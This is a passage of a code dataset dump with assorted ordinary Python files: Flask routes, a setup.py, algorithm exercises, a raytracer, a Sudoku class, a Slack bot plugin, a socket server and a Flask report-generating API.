= {'status': 'success'}\n post_data = request.get_json()\n print(vegetable_id)\n print(post_data)\n Vegetables.remove_vegetable(vegetable_id)\n VEGETABLES.append({\n 'id': uuid.uuid4().hex,\n 'name': post_data.get('name'),\n 'color': post_data.get('color')\n })\n response_object['message'] = 'Vegatable updated!'\n return jsonify(response_object)\n\n @staticmethod\n def delete(vegetable_id):\n response_object = {'status': 'success'}\n Vegetables.remove_vegetable(vegetable_id)\n response_object['message'] = 'Vegatable removed!'\n return jsonify(response_object)\n","sub_path":"HomeWorks/HW9/vegetables/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":2020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"441325175","text":"import sys\n\nimport setuptools\nfrom setuptools import setup\nfrom setuptools.command.test import test as TestCommand\n\n\nclass PyTest(TestCommand):\n user_options = [('pytest-args=', 'a', \"Arguments to pass to py.test\")]\n\n def initialize_options(self):\n TestCommand.initialize_options(self)\n self.pytest_args = []\n\n def finalize_options(self):\n TestCommand.finalize_options(self)\n self.test_args = []\n self.test_suite = True\n\n def run_tests(self):\n # import here, cause outside the eggs aren't loaded\n import pytest\n errno = pytest.main(self.pytest_args)\n sys.exit(errno)\n\n\nsetup(\n name='Autowire',\n packages=setuptools.find_packages(exclude=['tests']),\n version='0.3.5',\n description=\"Simple dependency injection.\",\n author='Geonu Choi',\n author_email='6566gun@gmail.com',\n url='https://github.com/hardtack/autowire',\n license='MIT LICENSE',\n keywords=['dependency-injection'],\n # Cmd\n cmdclass={\n 'test': PyTest,\n }\n)\n","sub_path":"pypi_install_script/Autowire-0.3.5.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"127873339","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nclass Solution(object):\n def removeDuplicates(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n if nums == []: return 0\n current = nums[0]\n tail = 1\n for ele in nums[1:]:\n if current != ele:\n current = nums[tail] = ele\n tail += 1\n #print(nums[:tail])\n return tail","sub_path":"Week_01/remove_duplicates_from_sorted_array.py","file_name":"remove_duplicates_from_sorted_array.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"531536755","text":"from collections import deque\n\n\ndef bfs(x):\n queue = deque()\n queue.append((x, 0))\n visit = [-1 for _ in range(n)]\n visit[x] = 0\n\n while queue:\n x, cnt = queue.popleft()\n for nx in arr[x]:\n if visit[nx] == -1:\n visit[nx] = cnt + 1\n queue.append((nx, cnt + 1))\n \n return sum(visit)\n \n\nn, m = map(int, input().split())\narr = [[] for _ in range(n)]\nanswer = 99999\nidx = -1\n\nfor i in range(m):\n a, b = map(int, input().split())\n arr[a - 1].append(b - 1)\n arr[b - 1].append(a - 1)\n\nfor i in range(n):\n tmp = bfs(i)\n if answer > tmp:\n idx = i + 1\n answer = tmp\n\nprint(idx)","sub_path":"BOJ/BOJ Python/PY1389_케빈_베이컨의_6단계_법칙.py","file_name":"PY1389_케빈_베이컨의_6단계_법칙.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"219619972","text":"import torch\nfrom .reflector_utils import compute_reflector, compute_reflector_normals\nfrom ..reflector import interpolate_potentials\nfrom .utils import *\nfrom .reflection_laws import specular_reflection\nfrom math import pi\n\nclass BackwardRaytracer:\n def __init__(self, source_description, ray_weighter, source_spatial_discretization, source_angular_support, reflector_height):\n self.source_definition = source_description\n self.ray_weighter = ray_weighter\n self.source = source_spatial_discretization\n self.source_angular_support = source_angular_support\n self.reflector_height = reflector_height\n\n def __str__(self):\n return f\"BackwardRaytracer(reflector_height = {self.reflector_height}, ray_weighter = {self.ray_weighter})\"\n\n def raytrace_reflector(self, \n sinkhorn_result):\n self.source_angular_support.requires_grad_(True)\n potential = interpolate_potentials(sinkhorn_result, self.source_angular_support) - interpolate_potentials(sinkhorn_result, torch.Tensor([[pi/2]]).to(self.source_angular_support.device)) + torch.log(torch.Tensor([self.reflector_height])).to(self.source_angular_support.device)\n potential_gradients = torch.autograd.grad(potential,\n self.source_angular_support,\n grad_outputs=torch.ones_like(potential).to(potential.device),\n create_graph=True,\n retain_graph=True)[0]\n potential = potential.view(-1)\n potential_gradients = potential_gradients.view(-1)\n reflectors = compute_reflector(to_unit_vector(self.source_angular_support.view(-1)), potential).view(1, -1, 2)\n\n incident_rays = reflectors[:, :, None, :] - self.source[None, None, :, :]\n incident_rays = normalize_vector(incident_rays)\n\n normals = compute_reflector_normals(to_unit_vector(self.source_angular_support.view(-1)), potential, potential_gradients)\n normals = normalize_vector(normals)\n\n reflected_rays = specular_reflection(incident_rays, normals[None, :, None, :])\n\n rays_weights = self.ray_weighter.compute_weights(incident_rays)\n\n return reflected_rays, rays_weights\n","sub_path":"reflector_problem/refl2d/raytracing/backward_raytracer.py","file_name":"backward_raytracer.py","file_ext":"py","file_size_in_byte":2327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"481275652","text":"\n\nclass Cellule:\n def __init__(self, x, y, valeur, grille):\n self.x = x\n self.y = y\n self.valeur = valeur\n self.grille = grille\n\n def is_valeur_valide(self, valeur):\n to_return = self.is_colonne_valide(valeur) and self.is_ligne_valide(valeur) and self.is_block_valide(valeur)\n print(to_return)\n return to_return\n \n def is_colonne_valide(self, valeur):\n for ligne in self.grille.model:\n if ligne[self.x].valeur == valeur:\n return False\n return True\n \n def is_ligne_valide(self, valeur):\n ligne = self.grille.model[self.y]\n for cellule in ligne:\n if cellule.valeur == valeur:\n return False\n return True\n\n def get_block_coordinate(self):\n return (self.x // 3 * 3), (self.y // 3 * 3)\n\n def is_block_valide(self, valeur):\n block_x, block_y = self.get_block_coordinate()\n for i in range(block_y, block_y + 3):\n for j in range(block_x, block_x + 3):\n if self.grille.model[i][j].valeur == valeur:\n return False\n return True","sub_path":"Cellule.py","file_name":"Cellule.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"592218558","text":"import time\nimport globalstatic\nfrom sftp_sync import sftp_local\nfrom sftp_sync import sftp_sftp\n\noutputs = []\ncrontabs = []\n\ntasks = {}\n\ndef process_message(data):\n global tasks\n channel = data[\"channel\"]\n text = data[\"text\"]\n\n def string_list(word_list,a_string):\n\n for k in word_list:\n if k in a_string:\n return True\n else: False\n\n\n if channel == globalstatic.main_channel:\n if globalstatic.main_channel in text or channel == globalstatic.main_channel:\n\n #tell time\n key_words = globalstatic.command_key\n if string_list(key_words,text):\n\n key_words = [\"time\"]\n if string_list(key_words, text):\n outputs.append([channel,\"The current time is \" + time.asctime( time.localtime(time.time()))])\n\n key_words = [\"print\"]\n if string_list(key_words, text):\n outputs.append([channel,\"I am printing\"])\n\n key_words = [\"deploy\"]\n if string_list(key_words, text):\n outputs.append([channel,\"I am performing synchronisation tasks....please wait\"])\n\n status, list = sftp_sftp.do_sync()\n\n if status:\n if len(list) > 0:\n\n outputs.append([channel,\"synchronisation complete, the following directories were successfully copied: \\n\" + '\\n'.join(list)])\n\n else:\n outputs.append([channel,\"synchronisation complete,no new directories were found\"])\n else:\n outputs.append([channel,\"synchronisation failed, please consult logs for more information\"])\n\n\n\n","sub_path":"plugins/commander.py","file_name":"commander.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"382037017","text":"'''\nRicky Cheah\nLab 6\n7/17/2020\n\nVarious assistive functions. \n'''\n\ndef bytePresentation(byte):\n '''\n This function takes in a byte, and returns the printable string form of the byte.\n Aids in writing to output files. \n '''\n if byte == b'\\n': return \"\\\\n\"\n if byte == b'\\r': return \"\\\\r\"\n if byte == b'\\t': return \"\\\\t\"\n \n if byte >= b' ' and byte <= b'~':\n return str(f\"'{byte.decode('utf-8')}'\")\n else:\n return f\"0x{byte.hex()}\"","sub_path":"csc255/Lab6_Cheah/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"465348452","text":"from flask import Flask, request, send_from_directory, make_response\r\nfrom utils.MyReport import create_pdf\r\nimport requests, json\r\nfrom flask import jsonify\r\n# 时间戳\r\nfrom datetime import datetime\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/')\r\ndef index():\r\n return r\"服务范例\"\r\n\r\n@app.route('/input', methods=['GET']) # 添加路由input\r\ndef input():\r\n # json_yq = request.args.get('data')\r\n # print('云雀json数据', json_yq)\r\n '''--- 测试数据 --'''\r\n json_yq = '{\"BestTeams\":{\"content\":[\"121253\",\"发生的\"],\"date\":1542261532000,\"file\":9,\"name\":\"test\",\"time\":7,\"userid\":\"20411542261473232\"},\"Starfriends\":{\"content\":[{\"content\":\"阿道夫\",\"date\":1542607597000,\"type\":\"text\"},{\"content\":\"123132\",\"date\":1544770491000,\"type\":\"text\"},{\"content\":\"41\",\"date\":1543477116000,\"type\":\"text\"},{\"content\":\"明德慎罚\",\"date\":1542607595000,\"type\":\"text\"},{\"content\":\"克劳德萨弗兰克\",\"date\":1542607594000,\"type\":\"text\"},{\"content\":\"阿道夫\",\"date\":1542607597000,\"type\":\"text\"},{\"content\":\"你家里宽带覆盖到了分公司\",\"date\":1542607592000,\"type\":\"text\"},{\"content\":\"123132\",\"date\":1544770491000,\"type\":\"text\"},{\"content\":\"你家里宽带覆盖到了分公司\",\"date\":1542607592000,\"type\":\"text\"},{\"content\":\"41\",\"date\":1543477116000,\"type\":\"text\"},{\"content\":\"明德慎罚\",\"date\":1542607595000,\"type\":\"text\"},{\"content\":\"克劳德萨弗兰克\",\"date\":1542607594000,\"type\":\"text\"}],\"date\":\"2018-11-19\",\"file\":4,\"name\":\"设计师3\",\"time\":18,\"userid\":\"10000025600000\"}}'\r\n data_yq = json.loads(json_yq)\r\n '''--- 星好友 ---'''\r\n friend_data = data_yq[\"Starfriends\"]\r\n '''--- 最佳团队 ---'''\r\n team_data = data_yq[\"BestTeams\"]\r\n '''--- 讨论测试数据 ---'''\r\n content_words = '阿道夫 123132 41 明德慎罚 哈哈 克劳德萨弗兰克 234 9001 四个 四个 四个 四个 四个人 阿道夫 你家里宽带覆盖到了分公司 你家里宽带覆盖到了分公司 41 明德慎罚 克劳德萨弗兰克 哈哈哈 这就是 我跟你说' \\\r\n '这艘不是 这都不是谁 硬核 太给力了 开会 明天要集体讨论 嗯 设计模式 哈哈 就这样吧 统一 同意 领导找你 对 就是这个 我不是跟你熟 来一下室办 是这个 你有' \\\r\n '照片么 文档发我一下 啊哪儿跟啊 在哪里开会 我在研发楼等你 打印一下报告 明天交报告 嗯嗯 好的 恩恩恩恩呢 嗯嗯 好的好的' \\\r\n '让我来 这是我来做 云雀 云雀 云雀 云雀 用云雀传 不用云雀传 云雀还可以 你把资料传云雀上 呼叫领导上云雀 我觉得可以 收到' \\\r\n '吃饭 楼下 这就来 感觉可以 真棒 先这样试试 辛苦了 发邮件 发nas 上传 光盘 刻录机 刚觉是 那本控制院里 知值奥 直到控制 ' \\\r\n '导航制导 仿真技术 北京故将 北京仿真中心 什么专业 不易 毕业了么 书记 主任 副主任 组长 研究院 副科长 胜利 好的 就这么牛皮'\r\n starttime = datetime.now()\r\n file_name = create_pdf(\r\n name='李爱国国', # 用户名\r\n name_id=friend_data[\"userid\"], # 用户id√\r\n head_image='./image/me.png', # 头像\r\n key_words='硬核少年', # 关键词\r\n user_data=[[2, 2, 1], [5, 6, 2], [3, 3, 1], [2, 3, 1], [6, 7, 2], [4, 8, 3]], # 六个能力\r\n key_language='爱国敬业诚信友善富强民主文明和谐自由平等公', # 评价\r\n value_data=[[1, 3], [20, 200], [31, 310], [90, 100]], # [我贡献值, 科室贡献值]\r\n friend_name=friend_data[\"name\"], # 好友姓名√\r\n friend_date=friend_data[\"date\"], # 初次相遇√\r\n friend_time=str(friend_data[\"time\"]), # 研讨次数√\r\n friend_file=str(friend_data[\"file\"]), # 文件交换√\r\n friend_content=content_words, # 讨论内容(好友)√ get_text_friend(data_yq)\r\n team_date=str(team_data['date']), # 创建时间√ 现在是int,最好(str)'2018-11-11'\r\n team_file=str(team_data['file']), # 上传文件√ int->str?我转?\r\n team_name=team_data['name'], # 最佳发言人√\r\n team_time=str(team_data['time']), # 团队人数√ int->str?我转?\r\n team_content=get_text_team(team_data[\"content\"]) # 讨论内容(团队)√(str)\"121253\" \"发生的\"\r\n )\r\n print('[Report]画PDF:', (datetime.now() - starttime))\r\n '''--- 返回json对象 to 忠哥 ---'''\r\n rjson={}\r\n rjson['answer'] = 'success'\r\n rjson['data'] = file_name\r\n return jsonify(rjson)\r\n\r\n@app.route(\"/download/\") # <参数>\r\ndef download(filename):\r\n response = make_response(send_from_directory('./static', filename, as_attachment=True))\r\n response.headers[\"Content-Disposition\"] = \"attachment; filename={}\".format(filename.encode().decode('latin-1')) # filename有中文也没问题\r\n return response\r\n\r\ndef get_text_friend(chart_string):\r\n return \" \".join([i[\"content\"] for i in chart_string[\"Starfriends\"][\"content\"]])\r\ndef get_text_team(chart_string):\r\n return \" \".join(i for i in chart_string)\r\n'''\r\na = json.loads(s)\r\nb = a[\"Starfriends\"][\"content\"]\r\nc = [i[\"content\"] for i in b]\r\n'''\r\n\r\nif __name__ == '__main__':\r\n app.run(host='0.0.0.0', port=1028) # 10.12.97.23 ipconfig\r\n # 0.0.0.0 监听全网\r\n # http://localhost:1028/input?data=test\r\n\r\n'''\r\n # if tool == 'CreatReport': # http://localhost:1028/input?data=CreatReport&user_id=111222199312091111\r\n # user_id = request.args.get('user_id')\r\n # r = requests.get('http://10.12.97.3:8083/interfaces/report/starfriends')\r\n # content_words = get_text(r.text)\r\n # else:\r\n # return \"错误校权token\"\r\n'''\r\n'''\r\n # return f\"http://localhost:1028/download/{file_name}\"\r\n # return f'下载链接'\r\n'''\r\n'''\r\n{\"knowledgeBehavior\":{\"knowledgeUploadCount\":9,\"knowledgeSharedCount\":4,\"knowledgeReadCount\":28}}\r\n'''\r\n\r\n# http://10.12.97.22:8006/giksp/count!getUserKB2018.action?formvalue=123456","sub_path":"API.py","file_name":"API.py","file_ext":"py","file_size_in_byte":6440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"456603101","text":"\"\"\"Exercicio 05\n\nFaça um programa que peça ao usuário digitar a quantidade de vendas do dia. Cadastre cada venda separadaemnte e depois mostre a média e o valor total vendido no dia.\n\"\"\"\n\nvendas_dia = []\ncont = int(input('Quantas vendas você fez hoje? '))\n\nfor i in range(1, (cont + 1)):\n vendas_dia.append(float(input(f'Informe a venda {i}: ')))\n\nprint(f'Média de vendas: R$ {sum(vendas_dia) / cont } \\nTotal de vendas: R$ {sum(vendas_dia)}')","sub_path":"Exercicios/Aulas00/aula09/parte1/exercicio5.py","file_name":"exercicio5.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"518570971","text":"previousNumber = int(input()) # previous number\r\ncurrent = 1 # current sequence lenth\r\nmaximum = 1 # maximum sequence lenth\r\nwhile previousNumber != 0:\r\n currentNumber = int(input()) # current number\r\n if currentNumber == previousNumber:\r\n if currentNumber == 0:\r\n break\r\n current += 1\r\n else:\r\n if current > maximum:\r\n maximum = current\r\n previousNumber = currentNumber\r\n current = 1\r\nprint(maximum)\r\n","sub_path":"MaximumandMaximum.py","file_name":"MaximumandMaximum.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"443942816","text":"import threading\nimport socket\nimport select\nimport sys\n\ndef get_ip():\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n try:\n s.connect(('10.255.255.255', 1))\n local_ip = s.getsockname()[0]\n except:\n local_ip = '127.0.0.1'\n finally:\n s.close()\n return local_ip\n\ndef clientthread(conn, addr):\n while True:\n try:\n message = conn.recv(65536)\n if message:\n print(\"<\" + addr[0] + \"> \" + message.decode('utf-8'))\n conn.send(\"hello\".encode('utf-8'))\n message2=conn.recv(65536)\n print(message2.decode('utf-8'))\n conn.send(\"got something new\".encode('utf-8'))\n else:\n retur\n except:\n continue\n\nthreads = list()\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\nIP_address = get_ip()\nPort = 10101\nserver.bind((IP_address, Port))\nserver.listen(100)\n\nwhile True:\n conn, addr = server.accept()\n x = threading.Thread(target=clientthread, args=(conn,addr))\n threads.append(x)\n x.start()\n\nconn.close()\nserver.close()\n","sub_path":"server3.py","file_name":"server3.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"577394744","text":"import re \r\nimport nltk\r\nfrom nltk.tokenize import word_tokenize\r\nimport sys\r\n\r\ndef cmaStopWord(text):\r\n\t\"\"\"To search and filter out stop words\"\"\"\r\n\t\r\ndef wOpenFile(filename):\r\n\tf = open('C:/Users/wkeil/Desktop/qafastamalti/qafasTaMalti/ilsien_sannaja/' + filename\r\n\t + '.txt', 'r')\r\n\ttext = f.read()\r\n\tf.close()\r\n\t# tokens = word_tokenize(text)\r\n\t# words = [w.lower() for w in tokens]\r\n\t# vocab = sorted(set(words))\r\n\t#text1 = text.split()\r\n\t#abstracts = nltk.Text(text1) #attach NLTK funcc\r\n\t# return set(vocab)\r\n\treturn text\r\n\r\ndef openfile():\r\n\t#takes the result from annotator and adds it to a file\r\n\tnameOfText = raw_input(\"Enter the name of the file to tag (no ext): \")\r\n\tdirectory = '//home/linguistlovepc/Documents/PythonProjects/maltese_nlp_app/kongugator_ta_feghel/qafasTaMalti/ilsien_sannaja/training_data/'\r\n\ttext = open(directory + nameOfText + '.txt','rU')\r\n\trtext = text.read()\r\n\ttokens = nltk.word_tokenize(rtext)\r\n\t#text = nltk.Text(tokens)\r\n\r\n\treturn text\r\n\r\ndef cmaPresVerb(text):\r\n\t\"\"\"To find possible present and progressive verbs\"\"\"\r\n\tallVerbs = []\r\n\r\n\tmatches = re.findall(r'\\b\\spi[a-zA-Z]+|\\spk[a-zA-Z]+', text, re.I)\r\n\tfor match in matches:\r\n\t\tallVerbs.append(match)\r\n\treturn allVerbs\r\n\r\ndef cmaPronoun(text):\r\n\t\"\"\"To search for any pronouns in a CMA text\"\"\"\r\n\tpronouns = []\r\n\r\n\tmatches = re.findall(r'\\bana|\\sint|\\snaxni|\\sintou|\\sinti|\\sinnen|\\souo|\\sie', text, re.I)\r\n\tfor match in matches:\r\n\t\tpronouns.append(match)\r\n\treturn pronouns\r\n\r\ndef annotator(text):\r\n\tprocessedText = text.split()\r\n\tannotatedText = []\r\n\t\"\"\"annotator needs to tag the punc marks seperate from the words\"\"\"\r\n\r\n\t\"ask the user what p.o.s a word is, for every word in the text\"\r\n\tfor word in processedText:\r\n\t\tword_pos = raw_input(\"Insert the POS of the word \" + word + \": \")\r\n\t\tif word:\r\n\t\t\tannotatedText.append(word + \"/\" + word_pos)\r\n\t\t\r\n\tannotatedText = str(annotatedText)\r\n\tannotatedText = annotatedText.lower().encode('utf-8')\r\n\t#this needs to be joined before list conversion #annotatedText = list(annotatedText)\r\n\r\n\tnameOfFile = raw_input(\"Which file is this to be placed in? \")\r\n\r\n\tfilename = open('//home/linguistlovepc/Desktop/lingApps/qafasTaMalti/ilsien_sannaja/training_data/' + nameOfFile + '.txt','a')\r\n\tfilename.write(annotatedText)\r\n\r\n\tprint(filename)\r\n\treturn annotatedText\r\n\r\n\t\"take the input from the user and add a '/' between the pos and the word\"\r\n\r\n\t\"\"\"punctuation may be a problem, how to deal with seperating words from punctuation\r\n\tand tag them as a punc mark\"\"\"","sub_path":"sanna/training_data/sannaLingFunctions.py","file_name":"sannaLingFunctions.py","file_ext":"py","file_size_in_byte":2491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"246538696","text":"class Student:\n def __init__(self, name):\n self.__name = name\n\n def set_name(self, name):\n self.__name = name\n\n def get_name(self):\n return self.__name\n\n def __step(self):\n print(\"%s make step.\" % self.__name)\n\n def going_home(self):\n self.__step()\n\n name = property(get_name, set_name)\n\n\nstudent = Student('Bob')\n\ntry:\n print(student.__name) # accessing a private attribute\nexcept AttributeError:\n print(\"\\t{}: name {}\".format(AttributeError.__name__, AttributeError.__doc__))\n\ntry:\n print(student.__step()) # accessing a private attribute\nexcept AttributeError:\n print(\"\\t{}: step() {}\".format(AttributeError.__name__, AttributeError.__doc__))\n\n\n# public method invocation --> all is OK\nstudent.going_home()\n# public method invocation --> all is OK\nstudent.set_name(\"Alice\")\nstudent.going_home()\n\n# accessing an attribute via its property object\nstudent.name = 'Mark'\nprint(student.name)","sub_path":"presentation/encapsulation.py","file_name":"encapsulation.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"356826415","text":"from app import app, db, models\nimport app.Scripts.ConnectionsValidation as conn\n\ndef IncrementConnections(trip_id):\n connections = models.Connection.query.filter().all()\n trip = models.Trip.query.filter(models.Trip.id == trip_id).first()\n if trip == None:\n print('ERROR: INVALID TRIP')\n return\n\n for connection in connections:\n person = connection.person\n\n if person == None:\n continue\n if person.attending == False:\n continue\n\n status, res = conn.GetMember(connection.chamber, connection.state, connection.district)\n member = res.first()\n\n if member == None:\n continue\n\n primary_meetings = models.Meeting.query.filter(models.Meeting.datetime != None, models.Meeting.member_id == member.id, models.Meeting.primary_id == person.id, models.Meeting.trip_id == trip_id)\n\n secondary_meetings = models.Meeting.query.filter(models.Meeting.datetime != None, models.Meeting.member_id == member.id, models.Meeting.secondary_id == person.id, models.Meeting.trip_id == trip_id)\n\n if len(primary_meetings.all()) == 1:\n meeting = primary_meetings.first()\n meeting_type = 'PRIMARY'\n\n elif len(secondary_meetings.all()) == 1:\n meeting = secondary_meetings.first()\n meeting_type = 'SECONDARY'\n\n else:\n continue\n\n old_visits = connection.visits\n if (old_visits > 0): continue\n\n connection.visits += 1\n new_visits = connection.visits\n\n print(person, member, meeting, meeting_type, 'visits: {}->{}'.format(old_visits, new_visits))\n\n db.session.commit()\n\ndef AddConnectionsFromPreviousVisits(trip_id):\n meetings = models.Meeting.query.filter(models.Meeting.datetime != None, models.Meeting.trip_id == trip_id).all()\n\n for meeting in meetings:\n primary = meeting.primary\n secondary = meeting.secondary\n member = meeting.member\n\n chamber = 'senate' if member.chamber_id==1 else 'house'\n state = member.state_code\n district = member.senate_class if chamber=='senate' else member.house_district\n\n # Get all connections primary/secondary-member connections\n primary_connections = models.Connection.query.filter(models.Connection.chamber==chamber, models.Connection.district==district, models.Connection.state==str(state), models.Connection.person_id==primary.id).all()\n\n if len(primary_connections) == 0:\n connection = models.Connection(chamber=chamber, district=district, state=state, person_id=primary.id, type=[u'NA'], visits=1)\n db.session.add(connection)\n print(member, primary, 'PRIMARY', len(primary_connections))\n\n if secondary != None:\n secondary_connections = models.Connection.query.filter(models.Connection.chamber==chamber, models.Connection.district==district, models.Connection.state==str(state), models.Connection.person_id==secondary.id).all()\n\n if len(secondary_connections) == 0:\n connection = models.Connection(chamber=chamber, district=district, state=state, person_id=secondary.id, type=[u'NA'], visits=1)\n db.session.add(connection)\n print(member, secondary, 'SECONDARY', len(secondary_connections))\n\n print('{} meetings total'.format(len(meetings)))\n db.session.commit()\n","sub_path":"app/Scripts/ConnectionsUtils.py","file_name":"ConnectionsUtils.py","file_ext":"py","file_size_in_byte":3393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"154860926","text":"from abc import ABC, abstractmethod\nfrom contextlib import contextmanager\nfrom uuid import uuid4\n\nimport pytest\nfrom sqlalchemy import (\n delete,\n select,\n UniqueConstraint,\n)\n\n\nclass AbstractBaseTest(ABC):\n @pytest.fixture\n def cls_(self):\n \"\"\"\n Return class under test.\n Assumptions: if the class under test is Foo, then the class grouping\n the tests should be a subclass of BaseTest, named TestFoo.\n \"\"\"\n prefix = len(\"Test\")\n class_name = self.__class__.__name__[prefix:]\n return getattr(self.get_model(), class_name)\n\n @abstractmethod\n def get_model(self):\n pass\n\n\ndef dbcleanup_wrapper(session, obj, where_clause=None):\n with dbcleanup(session, obj, where_clause):\n yield obj\n\n\n@contextmanager\ndef dbcleanup(session, obj, where_clause=None):\n \"\"\"\n Use the session to store obj in database; delete from database on exit, bypassing the session.\n\n If obj does not have an id field, a SQLAlchemy WHERE clause should be provided to construct\n a custom select statement.\n \"\"\"\n return_id = where_clause is None\n\n try:\n obj_id = persist(session, obj, return_id)\n yield obj_id\n finally:\n table = obj.__table__\n if where_clause is None:\n where_clause = _get_default_where_clause(type(obj), obj_id)\n stmt = delete(table).where(where_clause)\n session.execute(stmt)\n\n\ndef persist(session, obj, return_id=True):\n \"\"\"\n Use the session to store obj in database, then remove obj from session,\n so that on a subsequent load from the database we get a clean instance.\n \"\"\"\n session.add(obj)\n session.flush()\n obj_id = obj.id if return_id else None # save this before obj is expunged\n session.expunge(obj)\n return obj_id\n\n\ndef delete_from_database(session, objects):\n \"\"\"\n Delete each object in objects from database.\n May be called at the end of a test if use of a context manager is impractical.\n (Assume all objects have the id field as their primary key.)\n \"\"\"\n # Ensure we have a list of objects (check for list explicitly: a model can be iterable)\n if not isinstance(objects, list):\n objects = [objects]\n\n for obj in objects:\n table = obj.__table__\n stmt = delete(table).where(table.c.id == obj.id)\n session.execute(stmt)\n\n\ndef get_stored_obj(session, cls, obj_id=None, where_clause=None, unique=False):\n # Either obj_id or where_clause must be provided, but not both\n assert bool(obj_id) ^ (where_clause is not None)\n if where_clause is None:\n where_clause = _get_default_where_clause(cls, obj_id)\n stmt = select(cls).where(where_clause)\n result = session.execute(stmt)\n # unique() is required if result contains joint eager loads against collections\n # https://gerrit.sqlalchemy.org/c/sqlalchemy/sqlalchemy/+/2253\n if unique:\n result = result.unique()\n return result.scalar_one()\n\n\ndef has_unique_constraint(table, fields):\n for constraint in table.constraints:\n if isinstance(constraint, UniqueConstraint):\n col_names = {c.name for c in constraint.columns}\n if set(fields) == col_names:\n return True\n\n\ndef has_index(table, fields):\n for index in table.indexes:\n col_names = {c.name for c in index.columns}\n if set(fields) == col_names:\n return True\n\n\ndef collection_consists_of_objects(collection, *objects):\n \"\"\"\n Returns True iff list(collection) == list(objects), where object equality is determined\n by primary key equality: object1.id == object2.id.\n \"\"\"\n if len(collection) != len(objects): # False if lengths are different\n return False\n if not collection: # True if both are empty\n return True\n\n # Sort, then compare each member by its 'id' attribute, which must be its primary key.\n collection.sort(key=lambda item: item.id)\n objects = list(objects) # type: ignore\n objects.sort(key=lambda item: item.id) # type: ignore\n\n for item1, item2 in zip(collection, objects):\n if item1.id is None or item2.id is None or item1.id != item2.id:\n return False\n return True\n\n\ndef get_unique_value():\n \"\"\"Generate unique values to accommodate unique constraints.\"\"\"\n return uuid4().hex\n\n\ndef _get_default_where_clause(cls, obj_id):\n where_clause = cls.__table__.c.id == obj_id\n return where_clause\n","sub_path":"test/unit/data/model/mapping/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":4440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"576444018","text":"#! /usr/bin/python3\n\nimport paho.mqtt.client as mqtt\nimport time\nimport json\n\nverbose = False\n\n\ndef on_log(client, userdata, level, buf):\n print(\"log: \"+buf)\n\n\ndef on_connect(client, userdata, flags, rc):\n if rc == 0:\n print(\"connected OK\")\n else:\n print(\"Bad connection Returned code=\", rc)\n\n# on_message will get messages from the topics subscribed to\n\n\ndef on_message(client, userdata, msg):\n topic = msg.topic\n msgPayload = json.loads(msg.payload)\n print(\"Topic: \", topic)\n print(\"Message: \", msgPayload)\n\n\ndef on_disconnect(client, userdata, flags, rc=0):\n print(\"Disconneted result code \"+str(rc))\n\n\nbroker = \"192.168.0.75\"\nclient = mqtt.Client(\"Broker_1\")\n\nclient.on_connect = on_connect\nif verbose:\n client.on_log = on_log\nclient.on_message = on_message\nclient.on_disconnect = on_disconnect\n\nprint(\"Connecting to broker \", broker)\nclient.connect(broker)\n# Topics\ntopic_con = \"sensor_connection\"\ntopic_temp = \"sensor_temp\"\ntopic_fan = \"sensor_fan\"\ntopic_fan_state = \"fan_state\"\nclient.subscribe(topic_con)\nclient.subscribe(topic_temp)\nclient.subscribe(topic_fan)\nclient.subscribe(topic_fan_state)\nclient.subscribe(\"topic_test\")\nclient.loop_start()\ntime.sleep(10)\nclient.publish(\"topic_test\", json.dumps(\n {\"Broker-1\": \"Broker-1 connected and going in the loop\"}))\n\nwhile 1:\n time.sleep(30)\n client.publish(\"topic_test\", json.dumps(\n {\"broker_1\": \"Broker-1 in test loop 30 seconds\"}))\n\nclient.loop_stop()\nclient.disconnect()\n","sub_path":"broker/mqtt_test_broker.py","file_name":"mqtt_test_broker.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"557553465","text":"import matplotlib.pyplot as plt\nfrom matplotlib import *\nfrom numpy import *\nfrom matplotlib.animation import *\n\nname = \"Log Spiral\"\ndef shape(fig, edge_c, 